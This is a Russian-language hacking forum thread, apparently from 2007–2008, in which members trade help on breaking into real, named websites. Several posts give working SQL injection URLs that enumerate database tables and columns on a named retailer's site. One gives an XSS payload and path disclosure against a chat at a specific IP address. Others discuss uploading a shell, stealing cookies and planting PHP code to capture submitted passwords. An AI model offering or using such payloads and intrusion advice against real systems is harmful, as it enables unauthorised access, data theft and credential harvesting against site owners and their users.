Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну хз тогда:) Дай ссыль в ПМ
     
  2. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    нашел xss. а незнаю чё с ней делать.. кто подскажет? пс читал тему xss для новичков недогнал... можно подробнее где?
     
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    че там неясно? почитай про использование веб-сниффера, про принципы работы кукисов в общем.
     
  4. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Помогите дальше раскурить:

    https://www.flintriverranchdogfood.net/customer_testimonials.php?testimonial_id=-11+union+select+1,2,3,4,5,version(),7,8--

    information_schema просмотрел, но вывести на страницу че-то не могу, везде еррор table doesn't exist.
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Попробуй перевести название таблицы в 16битный формат.
     
  6. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    -m0rgan-,
    Безрезультатно :(
     
  7. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0

    https://www.flintriverranchdogfood.net/customer_testimonials.php?testimonial_id=1+and+1=2+union+select+1,2,3,4,5,table_name,7,8+from+information_schema.tables--
     
    2 people like this.
  8. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Кто знает как моно воспользоваться вот этим? http://78.111.240.22/chat/skin4x-a/

    ????
     
  9. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    geforce
    можно сделать скрин .. потом помидитировать .. или ещё что ..

    .зы ничего

    хотя в http://78.111.240.22/chat/skin4x-a/templates/ есть пхп файлы но я там ничего интересного не нашёл ..
     
  10. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Кроме того что можно сделать скрин .. потом помидитировать .. или ещё что ..

    Нельзя не как туда шелу кинуть?
     
  11. none222

    none222 Guest

    Reputations:
    0
    geforce, ты с помощью этого видишь названия некоторых переменных. Можешь их проверить, авось, они не инициализируются... А если скрипт опен соурс - то ты получаешь ровным счётом ничего =)
     
  12. qazer

    qazer Member

    Joined:
    26 Nov 2008
    Messages:
    78
    Likes Received:
    45
    Reputations:
    -2
    помогите найти xss) форум ipb. за адресом в личку.

    все описанные баги не действуют,не могу поверить в неприступность )))
     
  13. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Эту инфу я вывел, не получается со столбцами.
     
  14. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    +where+table_name='имя таблицы'--
     
  15. none222

    none222 Guest

    Reputations:
    0
    для столбцов column_name+from+information_schema+where+table_name='tabla' (можно захексить)
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Всё там отлично выводится, не понимаю в чём проблема, вывод-- лучше не бывает, всё сразу, не морочте голову, если что-то не выводится перечитайте ЛЮБУЮ статью по SQL инъекциям
     
    #3936 Kakoytoxaker, 1 Dec 2008
    Last edited: 1 Dec 2008
  17. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    information_schema.columns может быть?
    А хексить не можно, а нужно...
     
  18. none222

    none222 Guest

    Reputations:
    0
    geforce
    http://78.111.240.22/chat/info.php
    вот те раскрытие пути


    а вот ксска
    http://78.111.240.22/chat/info.php?msg=<h1>XSS
    их там ещё много - анализируй имена переменных

    Ch3ck
    ну да, поскорой писал =) нужно ли хексить - даж не смотрел на фильтрацию ;)
     
  19. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Есть некий сайт. Есть таблица admin с хешированными в md5 паролями.
    Авторизация происходит с помощью "WWW-Authenticate: Basic".
    Сам сайт написан на PHP
    Можно ли встроить код таким образом, чтобы он работал по типу снифера?
    То есть отлавливал пароли, передаваемые методом POST и сохранял их в отдельный файлик.
    Можно ли такое сделать?
     
  20. none222

    none222 Guest

    Reputations:
    0
    конечно можно =) если парва на редактирование файла есть (или необходимых модулей) =)
     
    1 person likes this.
Thread Status:
Not open for further replies.